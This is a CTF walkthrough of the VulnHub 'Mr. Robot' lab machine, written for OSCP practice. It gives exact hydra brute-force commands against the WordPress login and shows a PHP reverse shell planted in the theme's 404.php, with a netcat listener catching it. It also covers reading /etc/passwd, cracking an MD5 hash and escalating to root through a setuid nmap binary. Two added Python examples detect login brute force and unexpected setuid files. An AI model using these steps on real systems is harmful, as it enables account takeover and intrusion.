Today we are doing the next box listed in the OSCP prep guide we got from school. The machine is called Mr. Robot, a reference to the hacker series Mr. Robot. A good one to watch! The machine can be downloaded from VulnHub at https://www.vulnhub.com/entry/mr-robot-1,151/
To find the machine on the network we used netdiscover. It showed us the IP 192.168.0.128. After reinstalling my Kali with the newest release it seems to be working again, although it took some time. Probably because of VMware NAT, but this isn't too much of a problem.
Let's see what services are available by running a simple nmap scan. After this one is completed we will run a full port scan to see if there is anything else running.
So there are a couple of services: SSH, which is closed, and port 80 and port 443. Let's run Nikto and Dirb on port 80 while we have a manual look at the http and the https website. They both seem to be the same: it looks like a terminal where we can put in some commands; see below.
After looking around I didn't find much on the website itself. Let's have a look at our Nikto and Dirb results.
Let's go from the top to the bottom. We found the following:
- The WordPress version 4.3.22
- A license file saying it is running WordPress, which we already knew
- /admin/index.html, which is the same website again
- /wp-login.php, which is a WordPress login page
Before we do anything else, let's have a look at our Dirb results; this probably found the same or even more pages. The results are pretty long and it is still running, scanning all the directories. This is the scan without going into the directories:
adeeli@Pentest:~$ dirb http://192.168.0.128

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue Feb 4 05:30:37 2020
URL_BASE: http://192.168.0.128/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.0.128/ ----
==> DIRECTORY: http://192.168.0.128/0/
==> DIRECTORY: http://192.168.0.128/admin/
+ http://192.168.0.128/atom (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.0.128/audio/
==> DIRECTORY: http://192.168.0.128/blog/
==> DIRECTORY: http://192.168.0.128/css/
+ http://192.168.0.128/dashboard (CODE:302|SIZE:0)
+ http://192.168.0.128/favicon.ico (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.0.128/feed/
==> DIRECTORY: http://192.168.0.128/image/
==> DIRECTORY: http://192.168.0.128/Image/
==> DIRECTORY: http://192.168.0.128/images/
+ http://192.168.0.128/index.html (CODE:200|SIZE:1188)
+ http://192.168.0.128/index.php (CODE:301|SIZE:0)
+ http://192.168.0.128/intro (CODE:200|SIZE:516314)
==> DIRECTORY: http://192.168.0.128/js/
+ http://192.168.0.128/license (CODE:200|SIZE:19930)
+ http://192.168.0.128/login (CODE:302|SIZE:0)
+ http://192.168.0.128/page1 (CODE:301|SIZE:0)
+ http://192.168.0.128/phpmyadmin (CODE:403|SIZE:94)
+ http://192.168.0.128/rdf (CODE:301|SIZE:0)
+ http://192.168.0.128/readme (CODE:200|SIZE:7334)
+ http://192.168.0.128/robots (CODE:200|SIZE:41)
+ http://192.168.0.128/robots.txt (CODE:200|SIZE:41)
+ http://192.168.0.128/rss (CODE:301|SIZE:0)
+ http://192.168.0.128/rss2 (CODE:301|SIZE:0)
+ http://192.168.0.128/sitemap (CODE:200|SIZE:0)
+ http://192.168.0.128/sitemap.xml (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.0.128/video/
==> DIRECTORY: http://192.168.0.128/wp-admin/
+ http://192.168.0.128/wp-config (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.0.128/wp-content/
+ http://192.168.0.128/wp-cron (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.0.128/wp-includes/
+ http://192.168.0.128/wp-links-opml (CODE:200|SIZE:228)
+ http://192.168.0.128/wp-load (CODE:200|SIZE:0)
+ http://192.168.0.128/wp-login (CODE:200|SIZE:2747)
+ http://192.168.0.128/wp-mail (CODE:403|SIZE:3018)
+ http://192.168.0.128/wp-settings (CODE:500|SIZE:0)
+ http://192.168.0.128/wp-signup (CODE:302|SIZE:0)
+ http://192.168.0.128/xmlrpc (CODE:405|SIZE:42)
+ http://192.168.0.128/xmlrpc.php (CODE:405|SIZE:42)
So there is a file named robots.txt on the website and also in the admin directory (which contains nothing). The one in the root contains the following:
Seems like we got the first flag in a file named "key-1-of-3.txt"; we probably have to find three flags on the box. Let's go to http://192.168.0.128/key-1-of-3.txt and it shows us the flag.
The other file, fsocity.dic, is a file we can download. But what is it? Before we have a look, let's see if our full nmap port scan found any extras, and it did not. So let's have a look at this fsocity.dic file by using file <filename>. But this doesn't give us too much information.
Google tells us a .dic file is a dictionary file, so I catted the file and we see a long list of words and some random things as well:
The file seems to have 858160 entries. Damn, are there any doubles? Yes, there are a lot; most of them are in there 75 times. With some help from a post on Stack Overflow I was able to count the duplicate lines and sort by count to see which ones were not in there that often. Seems like we found the second flag.
But I'm not sure; we will find out later. Let's format this dictionary file so we only have one entry of each word, since we may need to use it to brute force something. I did this with the command
sort fsocity.dic | uniq > sorted.txt It now has 11451 lines.
So let's start brute forcing the WordPress login page. I knew I had to use hydra but it has been a while since I have used it, so I googled a bit and came up with the following command:
hydra -L Downloads/sorted.txt -p dontknow 192.168.0.128 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username' -t 64
Let's break it down:
- -L Downloads/sorted.txt: use our sorted wordlist as the list of usernames
- -p dontknow: use a single password, in this case dontknow
- 192.168.0.128: the machine we attack
- http-form-post: the request type, a POST form
- /wp-login.php: the page path
- :log=^USER^: the username variable
- &pwd=^PASS^: the password variable
- F=Invalid username: the string that marks a failed attempt
- -t 64: use 64 threads to speed it up a bit
After a couple of minutes we found a user elliot, the main character in the Mr. Robot series.
We can use the same command, built a bit differently, to brute force the password. I used the following command:
hydra -l elliot -P Downloads/sorted.txt 192.168.0.128 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=The password you entered' -t 64
We found the password and we are able to log in to the wp-admin panel.
Seems like we are administrator and there is one other user:
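Both hydra runs above produce one POST to /wp-login.php per guess, which is what stands out on the server side. The following detector, an added example that is not part of the original write-up, reads Apache access-log lines and flags any source that sends more than a threshold of POSTs to wp-login.php inside a sliding time window; the log lines, IPs and threshold are constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache combined-log line; only the fields the detector needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def find_login_bruteforce(lines, threshold=10, window_s=60):
    """Return {ip: peak number of POSTs to /wp-login.php seen inside any
    window_s-second window} for every source that reaches `threshold`.
    Assumes the lines are in chronological order, as an access log is."""
    recent = defaultdict(deque)   # ip -> timestamps of its recent login POSTs
    peak = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or not m["path"].startswith("/wp-login.php"):
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        q = recent[m["ip"]]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:   # drop tries outside the window
            q.popleft()
        if len(q) >= threshold:
            peak[m["ip"]] = max(peak.get(m["ip"], 0), len(q))
    return peak


def _line(ip, hhmmss, method, path, status):
    # Builds one constructed log line in Apache combined format.
    return (f'{ip} - - [04/Feb/2020:{hhmmss} +0000] "{method} {path} HTTP/1.1" '
            f'{status} 2747 "-" "Mozilla/5.0"')


# Constructed sample: one lone earlier try, one normal visitor who loads the
# form and logs in once, then a burst of 12 guesses in three seconds
# (192.168.0.100 is a made-up source address).
SAMPLE_LOG = [
    _line("192.168.0.100", "05:38:00", "POST", "/wp-login.php", 200),
    _line("192.168.0.50", "05:40:01", "GET", "/wp-login.php", 200),
    _line("192.168.0.50", "05:40:09", "POST", "/wp-login.php", 302),
] + [_line("192.168.0.100", f"05:40:{10 + i // 4:02d}", "POST", "/wp-login.php", 200)
     for i in range(12)]

if __name__ == "__main__":
    print(find_login_bruteforce(SAMPLE_LOG))   # {'192.168.0.100': 12}
```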
I have done this before: we can upload a reverse shell and load the page to get a shell, or add the PHP reverse shell to an existing PHP file. Let's try this out. First let's copy a reverse shell with the following command:
cp /usr/share/webshells/php/php-reverse-shell.php ~/mrrobot/. Then we have to edit it so it connects back to our host and change the port. We changed it to 8080; then we have to start a listener with netcat.
nc -lvp 8080
Then we go to the WordPress dashboard, open the menu on the left, go to Appearance and then Editor, and we replace the contents of the 404.php file with the reverse shell. To be sure, we store the original 404.php contents in a text file in case we need to revert it. Now we need to trigger a 404 error on the website by requesting a page that doesn't exist. Shouldn't be too hard. So I made a post, went to preview and changed the URL to get a 404 error, and we got a shell.
We are the daemon user. Let's see what other users are listed:
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:103:106:ftp daemon,,,:/srv/ftp:/bin/false
bitnamiftp:x:1000:1000::/opt/bitnami/apps:/bin/bitnami_ftp_false
mysql:x:1001:1001::/home/mysql:
varnish:x:999:999::/home/varnish:
robot:x:1002:1002::/home/robot:
When I went to the home directory of robot I found two files: the second key and a password.raw-md5 file. MD5 is a hashing algorithm, so this is probably a hash and we can try to crack it.
So let's try to crack this hash with hashcat. While this was running I already found the cracked value online: abcdefghijklmnopqrstuvwxyz. But let's see if hashcat can crack it in the background; we used the sorted.txt wordlist we made earlier. We can su to the robot user and cat the second key.
Now we have to find the third key, probably by getting root access, so we have to find a privilege escalation. I normally do this manually, but I want to make myself familiar with the scripts, so for this box I will use linuxprivchecker.py again. We can get this from GitHub. Let's download it and copy it to our /var/www/html folder so we can wget it on the target after we have started the apache2 service. I did this in my previous write-up if you want to find the commands. After wgetting the file we have to make it executable with chmod +x and we can run it. Let's have a look at the results; here are the interesting parts:
So let's try the first exploit, which didn't work. Then I tried the cap_sys_admin exploit, which didn't work either. Let's try the MySQL one and then we go back to manual stuff. The second one gives errors, so back to manual stuff. Seems like nmap has the SUID bit set. You can find files with the SUID bit set with the command find / -perm -u=s -type f 2>/dev/null. Nmap should have a shell escape, as linuxprivchecker said.
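The find command above is the one-off check; on a host you administer the same question is better asked as an audit that compares the setuid files present against the set you expect, so an extra one like nmap shows up. This is an added example, not part of the original write-up: the walker mirrors find / -perm -u=s -type f, the expected-set baseline is an assumption you would fill in for your own build, and build_demo_tree constructs a throwaway directory so the audit can be run without scanning a real box.

```python
import os
import stat
import tempfile

# Assumed baseline: setuid binaries you expect on the host (stock system tools).
# Anything setuid that is not listed here gets reported.
EXPECTED_SUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/newgrp",
}


def find_setuid(root="/"):
    """Walk `root` and return the sorted paths of regular files with the setuid bit
    set (symlinks are skipped via lstat; unreadable entries are ignored)."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)


def unexpected_setuid(root="/", baseline=EXPECTED_SUID):
    """Setuid files under `root` that are not in the expected baseline."""
    return [p for p in find_setuid(root) if p not in baseline]


def build_demo_tree():
    """Constructed fixture: a temp directory holding one setuid file (standing in
    for the nmap binary on the box) and one plain file. Returns (root, suid_path)."""
    base = tempfile.mkdtemp()
    suid = os.path.join(base, "nmap")
    plain = os.path.join(base, "ls")
    for p in (suid, plain):
        with open(p, "w") as f:
            f.write("#!/bin/sh\n")
    os.chmod(suid, 0o4755)   # rwsr-xr-x: setuid set
    os.chmod(plain, 0o755)   # rwxr-xr-x: no setuid
    return base, suid


if __name__ == "__main__":
    root, _ = build_demo_tree()
    print(unexpected_setuid(root, baseline=set()))   # [.../nmap]
```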
We are root, but we still have to find the third flag, which I found in the root directory by doing cd /root. We found the third key and completed the box!